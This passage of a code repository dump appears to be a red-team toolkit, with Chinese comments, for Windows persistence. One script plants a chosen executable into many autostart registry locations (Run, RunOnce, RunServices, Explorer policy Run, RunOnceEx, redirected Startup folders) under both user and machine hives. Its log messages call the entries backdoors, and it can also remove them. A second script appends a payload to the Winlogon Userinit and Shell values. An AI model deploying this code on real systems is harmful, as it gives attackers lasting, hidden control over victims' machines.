r"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" 56 | reg = pyregedit.RegEdit(root,path) 57 | 58 | if reg.check_key(): 59 | pass 60 | else: 61 | try: 62 | reg.create_key() 63 | logger.info('创建 Explorer\Run 键值') 64 | except: 65 | logger.error('需要管理员权限') 66 | return 67 | try: 68 | reg.create_value(value_name, pyregedit.REG_SZ, cmd) 69 | logger.info('插入注册表成功') 70 | except: 71 | logger.error('插入注册表失败') 72 | 73 | def set_user_RunServices(cmd): 74 | root = pyregedit.HKEY_CURRENT_USER 75 | path = r"Software\Microsoft\Windows\CurrentVersion\RunServices" 76 | reg = pyregedit.RegEdit(root,path) 77 | 78 | if reg.check_key(): 79 | pass 80 | else: 81 | reg.create_key() 82 | logger.error('创建 RunServices 键值') 83 | 84 | try: 85 | reg.create_value(value_name, pyregedit.REG_SZ, cmd) 86 | logger.info('插入注册表成功') 87 | except: 88 | logger.error('插入注册表失败') 89 | 90 | def set_user_RunServicesOnce(cmd): 91 | root = pyregedit.HKEY_CURRENT_USER 92 | path = r"Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" 93 | reg = pyregedit.RegEdit(root,path) 94 | 95 | if reg.check_key(): 96 | pass 97 | else: 98 | reg.create_key() 99 | logger.error('创建 RunServicesOnce 键值') 100 | 101 | try: 102 | reg.create_value(value_name, pyregedit.REG_SZ, cmd) 103 | logger.info('插入注册表成功') 104 | except: 105 | logger.error('插入注册表失败') 106 | 107 | # 在HKLM的Run 添加 108 | def set_system(cmd): 109 | 110 | root = pyregedit.HKEY_LOCAL_MACHINE 111 | path = r"Software\Microsoft\Windows\CurrentVersion\Run" 112 | reg = pyregedit.RegEdit(root,path) 113 | 114 | #判断键是否存在 115 | if reg.check_key(): 116 | #获取键(可用于其他操作) 117 | key = reg.get_key() 118 | else: 119 | #创建键 120 | logger.error('需要管理员权限!') 121 | return 122 | 123 | try: 124 | reg.create_value(value_name,pyregedit.REG_SZ,cmd) 125 | logger.info('插入注册表成功') 126 | except: 127 | logger.error('插入注册表失败') 128 | 129 | def set_system_runonce(cmd): 130 | root = pyregedit.HKEY_LOCAL_MACHINE 131 | path = r"Software\Microsoft\Windows\CurrentVersion\RunOnce" 132 | reg = pyregedit.RegEdit(root,path) 133 | 134 | if reg.check_key(): 135 | try: 136 | reg.create_value(value_name, pyregedit.REG_SZ, cmd) 137 | logger.info('插入注册表成功') 138 | except: 139 | logger.error('插入注册表失败') 140 | else: 141 | #创建键 142 | logger.error('RunOnce 键不存在') 143 | exit(0) 144 | 145 | def set_system_Explorer(cmd): 146 | root = pyregedit.HKEY_LOCAL_MACHINE 147 | path = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" 148 | reg = pyregedit.RegEdit(root,path) 149 | 150 | if reg.check_key(): 151 | pass 152 | else: 153 | reg.create_key() 154 | logger.error('创建 Explorer\Run 键值') 155 | 156 | try: 157 | reg.create_value(value_name, pyregedit.REG_SZ, cmd) 158 | logger.info('插入注册表成功') 159 | except: 160 | logger.error('插入注册表失败') 161 | 162 | def set_system_RunServices(cmd): 163 | root = pyregedit.HKEY_LOCAL_MACHINE 164 | path = r"Software\Microsoft\Windows\CurrentVersion\RunServices" 165 | reg = pyregedit.RegEdit(root,path) 166 | 167 | if reg.check_key(): 168 | pass 169 | else: 170 | reg.create_key() 171 | logger.error('创建 RunServices 键值') 172 | 173 | try: 174 | reg.create_value(value_name, pyregedit.REG_SZ, cmd) 175 | logger.info('插入注册表成功') 176 | except: 177 | logger.error('插入注册表失败') 178 | 179 | def set_system_RunServicesOnce(cmd): 180 | root = pyregedit.HKEY_LOCAL_MACHINE 181 | path = r"Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" 182 | reg = pyregedit.RegEdit(root,path) 183 | 184 | if reg.check_key(): 185 | pass 186 | else: 187 | reg.create_key() 188 | logger.error('创建 RunServicesOnce 键值') 189 | 190 | try: 191 | reg.create_value(value_name, pyregedit.REG_SZ, cmd) 192 | logger.info('插入注册表成功') 193 | except: 194 | logger.error('插入注册表失败') 195 | 196 | def set_system_RunOnceEx_exe(cmd): 197 | root = pyregedit.HKEY_LOCAL_MACHINE 198 | path = r"Software\Microsoft\Windows\CurrentVersion\RunOnceEx\0001" 199 | reg = pyregedit.RegEdit(root,path) 200 | 201 | if reg.check_key(): 202 | pass 203 | else: 204 | reg.create_key() 205 | logger.error('创建 RunOnceEx\\0001 键值') 206 | 207 | try: 208 | reg.create_value(value_name, pyregedit.REG_SZ, cmd) 209 | logger.info('插入注册表成功') 210 | except: 211 | logger.error('插入注册表失败') 212 | 213 | def set_system_RunOnceEx_dll(cmd): 214 | root = pyregedit.HKEY_LOCAL_MACHINE 215 | path = r"Software\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend" 216 | reg = pyregedit.RegEdit(root,path) 217 | 218 | if reg.check_key(): 219 | pass 220 | else: 221 | reg.create_key() 222 | logger.error(r'创建 RunOnceEx\0001\Depend 键值') 223 | 224 | try: 225 | reg.create_value(value_name, pyregedit.REG_SZ, cmd) 226 | logger.info('插入注册表成功') 227 | except: 228 | logger.error('插入注册表失败') 229 | 230 | # 删除键值 231 | def clear_system(): 232 | root = pyregedit.HKEY_LOCAL_MACHINE 233 | path = r"Software\Microsoft\Windows\CurrentVersion\Run" 234 | reg = pyregedit.RegEdit(root,path) 235 | 236 | #判断键是否存在 237 | if reg.check_key(): 238 | try: 239 | if reg.delete_value(value_name): 240 | logger.info('Run 删除成功') 241 | else: 242 | logger.error('没有植入Run 后门') 243 | except: 244 | logger.error('Run 删除失败') 245 | else: 246 | logger.error('Run 需要管理员权限!') 247 | return 248 | 249 | path = r"Software\Microsoft\Windows\CurrentVersion\RunOnce" 250 | reg = pyregedit.RegEdit(root,path) 251 | if reg.delete_value(value_name): 252 | logger.info('RunOnce 删除成功') 253 | 254 | path = r"Software\Microsoft\Windows\CurrentVersion\RunServices" 255 | reg = pyregedit.RegEdit(root,path) 256 | if reg.check_key(): 257 | try: 258 | reg.delete_current_key() 259 | logger.info('RunServices 删除成功') 260 | except: 261 | logger.error('RunServices 删除失败') 262 | 263 | path = r"Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" 264 | reg = pyregedit.RegEdit(root,path) 265 | if reg.check_key(): 266 | try: 267 | reg.delete_current_key() 268 | logger.info('RunServicesOnce 删除成功') 269 | except: 270 | logger.error('RunServicesOnce 删除失败') 271 | 272 | path = r"Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" 273 | reg = pyregedit.RegEdit(root,path) 274 | if reg.check_key(): 275 | try: 276 | reg.delete_current_key() 277 | logger.info('Explorer\\Run 删除成功') 278 | except: 279 | logger.error('Explorer\\Run 删除失败') 280 | else: 281 | logger.error('没有植入HKLM Explorer\\Run 后门') 282 | 283 | path = r"Software\Microsoft\Windows\CurrentVersion\RunOnceEx\0001" 284 | reg = pyregedit.RegEdit(root,path) 285 | if reg.check_key(): 286 | try: 287 | try: 288 | reg.delete_sub_key('Depend') 289 | logger.info('RunOnceEx\\0001\\Depend 删除成功') 290 | except: 291 | pass 292 | reg.delete_current_key() 293 | logger.info('RunOnceEx\\0001 删除成功') 294 | except: 295 | logger.error('RunOnceEx\\0001 删除失败') 296 | else: 297 | logger.error('没有植入 RunOnceEx\\0001 后门') 298 | 299 | root = pyregedit.HKEY_CURRENT_USER 300 | path = r"Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" 301 | reg = pyregedit.RegEdit(root,path) 302 | if reg.check_key(): 303 | try: 304 | reg.delete_current_key() 305 | logger.info('Explorer\\Run 删除成功') 306 | except: 307 | logger.error('Explorer\\Run 删除失败') 308 | else: 309 | logger.error('没有植入HKCU Explorer\\Run 后门') 310 | 311 | # 删除键值 312 | def clear_user(): 313 | root = pyregedit.HKEY_CURRENT_USER 314 | path = r"Software\Microsoft\Windows\CurrentVersion\Run" 315 | reg = pyregedit.RegEdit(root,path) 316 | 317 | #判断键是否存在 318 | if reg.check_key(): 319 | try: 320 | if reg.delete_value(value_name): 321 | logger.info('Run 删除成功') 322 | else: 323 | logger.error('没有植入Run 后门') 324 | except: 325 | logger.error('Run 删除失败') 326 | else: 327 | pass 328 | 329 | path = r"Software\Microsoft\Windows\CurrentVersion\RunOnce" 330 | reg = pyregedit.RegEdit(root,path) 331 | if reg.delete_value(value_name): 332 | logger.info('RunOnce 删除成功') 333 | 334 | path = r"Software\Microsoft\Windows\CurrentVersion\RunServices" 335 | reg = pyregedit.RegEdit(root,path) 336 | if reg.check_key(): 337 | try: 338 | reg.delete_current_key() 339 | logger.info('RunServices 删除成功') 340 | except: 341 | logger.error('RunServices 删除失败') 342 | 343 | path = r"Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" 344 | reg = pyregedit.RegEdit(root,path) 345 | if reg.check_key(): 346 | try: 347 | reg.delete_current_key() 348 | logger.info('RunServicesOnce 删除成功') 349 | except: 350 | logger.error('RunServicesOnce 删除失败') 351 | 352 | def set_user_startup_folder_user(startup_path): 353 | root = pyregedit.HKEY_CURRENT_USER 354 | path = r"Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" 355 | reg = pyregedit.RegEdit(root,path) 356 | if reg.check_key(): 357 | pass 358 | else: 359 | reg.create_key() 360 | 361 | try: 362 | reg.create_value('Startup',pyregedit.REG_SZ,startup_path) 363 | logger.info('User Shell Folders Startup 修改成功') 364 | except: 365 | logger.error('User Shell Folders Startup 修改失败') 366 | 367 | def set_user_startup_folder_shell(startup_path): 368 | root = pyregedit.HKEY_CURRENT_USER 369 | path = r"Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" 370 | reg = pyregedit.RegEdit(root,path) 371 | if reg.check_key(): 372 | pass 373 | else: 374 | reg.create_key() 375 | 376 | try: 377 | reg.create_value('Startup',pyregedit.REG_SZ,startup_path) 378 | logger.info('Shell Folders Startup 修改成功') 379 | except: 380 | logger.error('Shell Folders Startup 修改失败') 381 | 382 | def clear_user_startup_folder(): 383 | value = r'%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' 384 | root = pyregedit.HKEY_CURRENT_USER 385 | path = r"Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" 386 | reg = pyregedit.RegEdit(root,path) 387 | if reg.check_key(): 388 | try: 389 | reg.create_value('Startup', pyregedit.REG_SZ, value) 390 | logger.info('User Shell Folders Startup 清除成功') 391 | except: 392 | logger.error('User Shell Folders Startup 清除失败') 393 | else: 394 | logger.info('User Shell Folders 键值不存在') 395 | 396 | 397 | 398 | path = r"Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" 399 | reg = pyregedit.RegEdit(root,path) 400 | if reg.check_key(): 401 | try: 402 | reg.create_value('Startup', pyregedit.REG_SZ, value) 403 | logger.info('Shell Folders Startup 清除成功') 404 | except: 405 | logger.error('Shell Folders Startup 清除失败') 406 | else: 407 | logger.info('Shell Folders 键值不存在') 408 | 409 | def set_system_startup_folder_user(startup_path): 410 | root = pyregedit.HKEY_LOCAL_MACHINE 411 | path = r"Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" 412 | reg = pyregedit.RegEdit(root,path) 413 | if reg.check_key(): 414 | pass 415 | else: 416 | logger.error('需要管理员权限!') 417 | return 418 | 419 | try: 420 | reg.create_value('Startup',pyregedit.REG_SZ,startup_path) 421 | logger.info('User Shell Folders Startup 修改成功') 422 | except: 423 | logger.error('User Shell Folders Startup 修改失败') 424 | 425 | def set_system_startup_folder_shell(startup_path): 426 | root = pyregedit.HKEY_LOCAL_MACHINE 427 | path = r"Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" 428 | reg = pyregedit.RegEdit(root,path) 429 | if reg.check_key(): 430 | pass 431 | else: 432 | logger.error('需要管理员权限!') 433 | return 434 | try: 435 | reg.create_value('Startup',pyregedit.REG_SZ,startup_path) 436 | logger.info('Shell Folders Startup 修改成功') 437 | except: 438 | logger.error('Shell Folders Startup 修改失败') 439 | 440 | def clear_system_startup_folder(): 441 | root = pyregedit.HKEY_LOCAL_MACHINE 442 | path = r"Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" 443 | reg = pyregedit.RegEdit(root,path) 444 | if reg.check_key(): 445 | try: 446 | reg.delete_value('Startup') 447 | logger.info('User Shell Folders Startup 清除成功') 448 | except: 449 | logger.error('User Shell Folders Startup 清除失败') 450 | else: 451 | logger.error('需要管理员权限!') 452 | return 453 | 454 | 455 | path = r"Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" 456 | reg = pyregedit.RegEdit(root,path) 457 | if reg.check_key(): 458 | try: 459 | reg.delete_value('Startup') 460 | logger.info('Shell Folders Startup 清除成功') 461 | except: 462 | logger.error('Shell Folders Startup 清除失败') 463 | else: 464 | logger.error('需要管理员权限!') 465 | return 466 | 467 | 468 | options_user = { 469 | 1 : set_user, 470 | 2 : set_user_runonce, 471 | 3 : set_user_RunServices, 472 | 4 : set_user_RunServicesOnce, 473 | 5 : set_user_startup_folder_user, 474 | 6 : set_user_startup_folder_shell, 475 | 7 : clear_user, 476 | 8 : clear_user_startup_folder, 477 | } 478 | 479 | options_system = { 480 | 1: set_system, 481 | 2: set_system_runonce, 482 | 3: set_system_RunServices, 483 | 4: set_system_RunServicesOnce, 484 | 5: set_system_Explorer, 485 | 6: set_user_Explorer, 486 | 7: set_system_RunOnceEx_dll, 487 | 8: set_system_RunOnceEx_exe, 488 | 9: set_system_startup_folder_user, 489 | 10: set_system_startup_folder_shell, 490 | 11: clear_system, 491 | 12: clear_system_startup_folder, 492 | } 493 | 494 | struser= \ 495 | ''' startup 1 64.exe 496 | 1 : set_user, 497 | 2 : set_user_runonce, 498 | 3 : set_user_RunServices, 499 | 4 : set_user_RunServicesOnce, 500 | 5 : set_user_startup_folder_user, 501 | 6 : set_user_startup_folder_shell, 502 | 7 : clear_user, 503 | 8 : clear_user_startup_folder,''' 504 | 505 | strsystem=\ 506 | ''' startup 1 64.exe 507 | 1: set_system, 508 | 2: set_system_runonce, 509 | 3: set_system_RunServices, 510 | 4: set_system_RunServicesOnce, 511 | 5: set_system_Explorer, 512 | 6: set_user_Explorer, 513 | 7: set_system_RunOnceEx_dll, 514 | 8: set_system_RunOnceEx_exe, 515 | 9: set_system_startup_folder_user, 516 | 10: set_system_startup_folder_shell, 517 | 11: clear_system, 518 | 12: clear_system_startup_folder,''' 519 | 520 | if __name__ == '__main__': 521 | # cmd = r'C:\Users\test\Desktop\startup\64.exe' 522 | # path = r'C:\Users\test\Desktop\startup' 523 | action = int(sys.argv[1]) if len(sys.argv) > 1 else '' 524 | cmd = sys.argv[2] if len(sys.argv) > 2 else '' 525 | if ':' not in cmd and '\\' not in cmd: 526 | cmd = os.getcwd() + '\\' + cmd 527 | if shell.IsUserAnAdmin(): 528 | if not action or not cmd: 529 | print(strsystem) 530 | elif action == 11 or action == 12: 531 | options_system[action]() 532 | else: 533 | options_system[action](cmd) 534 | else: 535 | if not action or not cmd: 536 | print(struser) 537 | elif action == 7 or action == 8: 538 | options_user[action]() 539 | else: 540 | options_user[action](cmd) 541 | -------------------------------------------------------------------------------- /winlogon_helper_dll.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | # -*- coding: utf-8 -*- 3 | # @Time : 2020.02.06 4 | # @Author : Lhaihai 5 | # @File : winlogon_helper_dll 6 | # @Software: PyCharm 7 | # @Blog : http://www.Lhaihai.top 8 | """ 9 | Description : Winlogon是Windows组件,它处理各种活动,例如登录,注销,在身份验证期间加载用户配置文件,关闭,锁定屏幕等。这种行为由注册表管理,注册表定义了在Windows登录期间启动哪些进程。 从红队的角度来看,这些事件可以触发执行持久性的任意有效负载。 10 | """ 11 | 12 | 13 | import pyregedit.pyregedit as pyregedit 14 | from logger import factory_logger 15 | logger = factory_logger('winlogon_helper_dll') 16 | import sys,os 17 | 18 | def init(): 19 | root = pyregedit.HKEY_CURRENT_USER 20 | path = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" 21 | reg = pyregedit.RegEdit(root,path) 22 | return reg 23 | 24 | def HKLM_init(): 25 | root = pyregedit.HKEY_LOCAL_MACHINE 26 | path = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" 27 | reg = pyregedit.RegEdit(root,path) 28 | return reg 29 | 30 | def set_Userinit(cmd): 31 | reg = init() 32 | if reg.check_key(): 33 | try: 34 | reg.create_value('Userinit',pyregedit.REG_SZ,cmd) 35 | logger.info('Userinit 植入成功') 36 | except: 37 | logger.info('Userinit 植入失败') 38 | else: 39 | logger.error('winlogon 项不存在!') 40 | return 41 | 42 | def set_Userinit_HKLM(cmd): 43 | reg = HKLM_init() 44 | if reg.check_key(): 45 | try: 46 | value = reg.get_value('Userinit') 47 | reg.create_value('Userinit', pyregedit.REG_SZ, value[0]+cmd) 48 | logger.info('Userinit 植入成功') 49 | except Exception as e: 50 | logger.info('Userinit 植入失败'+str(e)) 51 | else: 52 | logger.error('需要管理员权限!') 53 | return 54 | 55 | def set_Shell(cmd): 56 | reg = init() 57 | if reg.check_key(): 58 | try: 59 | reg.create_value('Shell',pyregedit.REG_SZ,cmd) 60 | logger.info('Shell 植入成功') 61 | except: 62 | logger.info('Shell 植入失败') 63 | else: 64 | logger.error('winlogon 项不存在!') 65 | return 66 | 67 | def set_Shell_HKLM(cmd): 68 | reg = HKLM_init() 69 | if reg.check_key(): 70 | try: 71 | value = reg.get_value('Shell') 72 | reg.create_value('Shell', pyregedit.REG_SZ, value[0]+','+cmd) 73 | logger.info('Shell 植入成功') 74 | except Exception as e: 75 | logger.info('Shell 植入失败'+str(e)) 76 | else: 77 | logger.error('需要管理员权限!') 78 | return 79 | 80 | def clear_HKCU(): 81 | reg = init() 82 | if reg.check_key(): 83 | try: 84 | reg.delete_value('Userinit') 85 | reg.delete_value('Shell') 86 | # reg.delete_value('Notify') 87 | logger.info('HKCU 清除成功') 88 | except: 89 | pass 90 | else: 91 | logger.error('winlogon 项不存在') 92 | return 93 | 94 | def clear_HKLM(): 95 | reg = HKLM_init() 96 | if reg.check_key(): 97 | try: 98 | reg.create_value('Userinit',pyregedit.REG_SZ,r'C:\Windows\system32\userinit.exe,') 99 | reg.create_value('Shell',pyregedit.REG_SZ,r'explorer.exe') 100 | # reg.delete_value('Notify') 101 | logger.info('HKLM 清除成功') 102 | except: 103 | logger.info('HKLM 清除失败') 104 | else: 105 | logger.error('需要管理员权限!') 106 | return 107 | 108 | if __name__ == '__main__': 109 | model = sys.argv[1] if len(sys.argv) > 1 else '' 110 | if model == 'shell': 111 | action = sys.argv[2] 112 | if action == 'set': 113 | cmd = sys.argv[3] 114 | # cmd = r'c:\64.exe' 115 | if ':' not in cmd and '\\' not in cmd: 116 | path = os.getcwd() + '\\' + cmd 117 | if os.path.exists(path): 118 | set_Shell_HKLM(path) 119 | else: 120 | logger.error(cmd + '文件不存在') 121 | else: 122 | set_Shell_HKLM(cmd) 123 | elif model == 'userinit': 124 | action = sys.argv[2] 125 | if action == 'set': 126 | cmd = sys.argv[3] 127 | # cmd = r'c:\64.exe' 128 | if ':' not in cmd and '\\' not in cmd: 129 | path = os.getcwd() + '\\' + cmd 130 | if os.path.exists(path): 131 | set_Userinit_HKLM(path) 132 | else: 133 | logger.error(cmd + '文件不存在') 134 | else: 135 | set_Userinit_HKLM(cmd) 136 | elif model == 'clear': 137 | clear_HKLM() 138 | else: 139 | print('winlogon_helper_dll_64.exe shell set 64.exe') 140 | print('winlogon_helper_dll_64.exe userinit set 64.exe') 141 | print('winlogon_helper_dll_64.exe clear') 142 | --------------------------------------------------------------------------------